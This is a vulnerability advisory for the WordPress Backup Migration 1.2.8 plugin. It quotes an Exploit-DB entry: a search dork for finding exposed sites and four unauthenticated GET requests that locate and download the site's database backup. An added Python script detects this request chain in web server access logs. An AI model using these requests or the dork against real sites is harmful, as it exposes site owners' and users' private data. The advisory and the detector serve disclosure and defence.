Vendor: Backup Migration Plugin
By: Wadeek
CVSS: 6.5 (MEDIUM)
Title: Unauthenticated Database Backup
CWE: 269
Product Name: Backup Migration Plugin
Affected Version From: 1.2.2008
Affected Version To: 1.2.2008
Patch Exists: YES
Related CWE:
CPE: a:backup_migration:backup_migration:1.2.8
Metasploit:
Other Scripts:
Platforms Tested: WordPress 6.2
Date: 2023

WordPress Plugin Backup Migration 1.2.8 – Unauthenticated Database Backup

The WordPress Plugin Backup Migration 1.2.8 allows unauthenticated users to access and download the database backup files. By exploiting this vulnerability, an attacker can gain unauthorized access to sensitive data.

Mitigation:

Update to the latest version of the plugin (1.2.9 or higher) which fixes this vulnerability. Restrict access to backup directories and files to authenticated users only.

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
# Date: 2023-05-10
# Exploit Author: Wadeek
# Vendor Homepage: https://backupbliss.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
# Version: 1.2.8
# Tested on: WordPress 6.2

1) Get the version of the plugin.

=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag: 1.2.8
--------------------------------------------------------------------------

2) Get the name of the backup directory.

=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------
{
[...],
"STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
[...],
"OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------

3) Get the name of the archive containing the backups.

=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------

4) Build the path for the download.

=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
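The four requests above leave a recognisable trail in the web server's access log: a read of the plugin's readme.txt, then config.json, then complete_logs.log, then a fetch of a BM_Backup_*.zip from a backup-migration-* directory. The script below is an added detection example for this advisory; it is not part of the Exploit-DB entry or of the plugin. It assumes the Apache/nginx "combined" log format, and the log lines in SAMPLE_LOG are constructed, not captured traffic. It groups matching requests per client address and raises an alert level depending on whether the config/log files or a backup archive were actually served (2xx) rather than merely requested.

```python
"""Detect the Backup Migration 1.2.8 disclosure chain in access logs.

Added example for this advisory (not from the Exploit-DB entry or the plugin).
Assumes the Apache/nginx "combined" log format; adjust LOG_RE for other formats.
"""
import re
from collections import defaultdict

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Paths taken from the advisory, in the order the disclosure chain uses them.
# The backup directory suffix and archive name are random per site, so they
# are matched with wildcards rather than literal values.
STEPS = [
    ("plugin-version", re.compile(r"^/wp-content/plugins/backup-backup/readme\.txt$")),
    ("config-json", re.compile(r"^/wp-content/backup-migration/config\.json$")),
    ("complete-logs", re.compile(r"^/wp-content/backup-migration/complete_logs\.log$")),
    ("backup-download", re.compile(
        r"^/wp-content/backup-migration-[^/]+/backups/BM_Backup_[^/]+\.zip$")),
]


def classify(path):
    """Return the chain step a request path corresponds to, or None."""
    path = path.split("?", 1)[0]  # ignore query strings
    for name, rx in STEPS:
        if rx.match(path):
            return name
    return None


def scan(lines):
    """Map client ip -> list of (step, http_status) for requests hitting the chain."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        step = classify(m.group("path"))
        if step:
            hits[m.group("ip")].append((step, int(m.group("status"))))
    return dict(hits)


def alerts(hits):
    """Assign an alert level per ip based on what the server actually returned.

    A 2xx on the backup archive means data left the server (critical); a 2xx on
    config.json or complete_logs.log means the directory name and archive name
    were exposed (high); anything else is reconnaissance that was blocked (info).
    """
    out = {}
    for ip, events in hits.items():
        served = {step for step, status in events if 200 <= status < 300}
        if "backup-download" in served:
            out[ip] = "critical: backup archive downloaded"
        elif served & {"config-json", "complete-logs"}:
            out[ip] = "high: backup directory metadata exposed"
        else:
            out[ip] = "info: probing for plugin, nothing served"
    return out


# Constructed sample log lines (not real traffic); addresses are RFC 5737 test ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2023:12:00:01 +0000] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 200 512 "-" "curl/7.88.1"',
    '203.0.113.5 - - [10/May/2023:12:00:02 +0000] "GET /wp-content/backup-migration/config.json HTTP/1.1" 200 1024 "-" "curl/7.88.1"',
    '203.0.113.5 - - [10/May/2023:12:00:03 +0000] "GET /wp-content/backup-migration/complete_logs.log HTTP/1.1" 200 2048 "-" "curl/7.88.1"',
    '203.0.113.5 - - [10/May/2023:12:00:04 +0000] "GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_2023-05-10_00_00_00_xXxXxxXxXxxXxXxx.zip HTTP/1.1" 200 5242880 "-" "curl/7.88.1"',
    '198.51.100.7 - - [10/May/2023:12:05:00 +0000] "GET /wp-content/backup-migration/config.json HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/May/2023:12:06:00 +0000] "GET /index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, level in alerts(scan(SAMPLE_LOG)).items():
        print(ip, level)
```

Run against a real log with `scan(open("access.log"))`. A 403 on config.json (the second client above) is what the mitigation's access restriction should produce once the plugin is updated or the backup-migration directories are blocked at the web server; a 200 on the zip is the signal that warrants incident response, since the archive contains the database dump.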